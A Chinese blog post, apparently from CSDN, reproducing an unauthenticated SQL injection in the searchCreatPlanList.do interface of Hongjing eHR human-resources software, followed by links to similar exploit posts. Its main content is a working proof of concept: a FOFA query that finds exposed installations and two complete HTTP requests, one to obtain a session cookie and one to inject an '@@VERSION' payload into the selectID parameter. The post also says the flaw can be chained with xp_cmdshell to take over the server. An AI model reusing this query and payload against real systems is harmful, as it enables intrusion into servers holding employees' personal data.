宏景eHR人力资源管理系统接口searchCreatPlanList存在SQL注入

原创 于 2025-05-20 15:27:15 发布 · 303 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #漏洞复现 #漏洞利用 #漏洞库 #渗透测试 #安全性测试

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

问题描述

宏景eHR searchCreatPlanList.do接口处存在sql注入,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该问题利用难度低,建议尽快修复。

fofa

app="HJSOFT-HCM"

poc

第一步:获取cookie

GET /templates/index/getpassword.jsp HTTP/1.1
Host: 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

第二步:携带cookie访问

GET /train/plan/searchCreatPlanList.do?b_selectPlan=query&selectID=1'%2B(1-@@VERSION)%2B')--+ HTTP/1.1
Host: 
Cookie: JSESSIONID=D3D69E3D8D5CD86DC4B10E91CD2062AB
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0

宏景eHR searchCreatPlanList.do SQL注入漏洞复现(CNVD-2025-6953)
0xSec
01-17 3235
宏景eHR searchCreatPlanList.do 接口存在SQL注入漏洞,,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
宏景eHR sduty/getSdutyTree SQL注入漏洞复现
0xSec
07-04 1104
宏景eHR /servlet/sduty/getSdutyTree 接口存在SQL注入漏洞,,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
0xSec
05-30 5438
宏景eHR 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用漏洞执行任意SQL指令,从而窃取数据库敏感信息。
宏景人力资源管理系统 searchCreatPlanList.do SQL注入漏洞(CNVD-2025-6953)
qq_43540348的博客
03-31 440
宏景人力资源管理系统是一款专业、高效的一体化HR管理平台,涵盖组织架构、招聘管理、员工档案、考勤薪资、绩效培训等核心模块,通过智能化流程与数据分析助力企业实现人力资源数字化转型升级。系统支持云端/本地部署,提供灵活配置与移动端应用,有效提升管理效率、降低人力成本,满足中大型企业复杂管理需求,同时确保数据安全与合规性。
漏洞复现宏景ehr-hcm-loadhistroyorgtree-sql注入
漏洞复现
01-09 638
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。该漏洞存在宏景EHR人力资源管理系统的 loadhistroyorgtree 接口处,该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
漏洞复现宏景人力资源信息管理系统 showmediainfo SQL注入漏洞
https://blog.echo234.cn/
04-04 1836
宏景科技是一家在智慧城市综合服务领域具有显著影响力的企业。公司以数字赋能百业兴旺,以智慧定义城市未来,致力于让城市管理更简单,让市民工作、生活更便捷。作为行业的佼佼者,宏景科技不断跟进物联网、大数据、云计算、GIS、人工智能等新技术的最新发展及应用,积极掌握并实现核心技术的更新迭代,积累了一定的技术储备。
漏洞复现宏景HCM-LoadOtherTreeServlet SQL注入
weixin_54799594的博客
07-11 1765
漏洞复现过程记录
宏景-ehr-hcm frcodeaddtreeservlet sql注入(含批量验证poc)
weixin_43567873的博客
04-09 202
宏景-ehr-hcm frcodeaddtreeservlet sql注入(含批量验证poc)
CNVD-2023-08743:宏景HCM SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
11-07 3044
宏景HCM系统 categories处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用漏洞执行任意SQL指令,从而窃取数据库敏感信息。
宏景eHR SQL 注入漏洞复现(CVE-2023-6655)
0xSec
12-11 1651
宏景eHR 中发现了一种被分类为关键的漏洞,该漏洞影响了Login Interface组件中/w_selfservice/oauthservlet/%2e../.%2e/general/inform/org/loadhistroyorgtree文件的某个未知功能。通过操纵参数parentid可能导致SQL注入攻击,未经过身份认证的远程攻击者可利用漏洞执行任意SQL指令,从而窃取数据库敏感信息。
漏洞复现宏景HCM人力资源信息管理系统——openFile-文件读取
LongL_GuYu的博客
06-29 1382
宏景HCM人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件,其`openFile接口`存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。
复现宏景EHR SQL注入漏洞_32
fushuang333的博客
01-29 1105
复现宏景EHR SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
1day CRMEB开源电商系统 products 接口存在SQL注入
weixin_43167326的博客
06-18 831
CRMEB开源电商系统是遥遥领先的开源电商系统,框架采用Tp6+MySQL+elementUI+uniapp,商城系统可商用;前后台都支持风格切换,包含小程序商城、H5商城、公众号商城、App,支持多语言、分销、拼团、砍价、秒杀、优惠券、积分、抽奖、会员等级、小程序直播、页面DIY,前后端分离,方便二开,使用文档、接口文档、数据字典、代码生成、二开文档/视频教程。
宏景eHR SmsAcceptGSTXServlet XXE漏洞复现
0xSec
01-26 1136
宏景eHR SmsAcceptGSTXServlet接口存在XML实体注入漏洞,未经身份认证的攻击者可以利用漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
【1day】宏景OA get_org_tree.jsp接口SQL注入漏洞学习
记录并分享学习安全的知识点..
11-02 683
宏景OA是一款基于云计算和SaaS模式的企业级办公自动化软件,它为企业提供了全面的办公自动化解决方案,包括协同办公、流程管理、文档管理、知识管理、人力资源管理、客户关系管理等多个模块。它可以帮助企业提高工作效率、降低成本、提高管理水平和企业形象。宏景OA get_org_tree.jsp存在接口SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
漏洞复现宏景HCM人力资源信息管理系统——LoadOtherTreeServlet——SQL注入
LongL_GuYu的博客
07-13 1307
宏景HCM人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件,旨在帮助企事业单位构建高绩效组织,推动组织健康成长,提升组织软实力。其`LoadOtherTreeServlet`接口处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
宏景eHR fileDownLoad SQL注入漏洞复现
0xSec
01-10 1002
宏景eHR fileDownLoad 接口存在SQL注入漏洞,未经过身份认证的远程攻击者可利用漏洞执行任意SQL指令,从而窃取数据库敏感信息
宏景eHR downlawbase SQL注入漏洞复现
qq_36334672的博客
03-30 493
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。面向复杂单组织或多组织客户,支持流程,B/S架构。特别适合集团化管理和跨地域使用的产品,融合了最新的互联网技术和先进的人力资源管理理念和实践,更好地支持异地办公和网上流程,加强了人力资源业务的集中管理和协同,支持集团管控、目标管理、领导决策等应用。
宏景人力资源信息管理系统KhFieldTree接口SQL注入漏洞复现过程
最新发布
09-04
由于没有直接关于宏景人力资源信息管理系统KhFieldTree接口SQL注入漏洞复现过程的内容,可参考其他类似接口复现思路进行推测。 对于宏景HCM人力资源信息管理系统的LoadOtherTreeServlet接口,其因对传入的数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值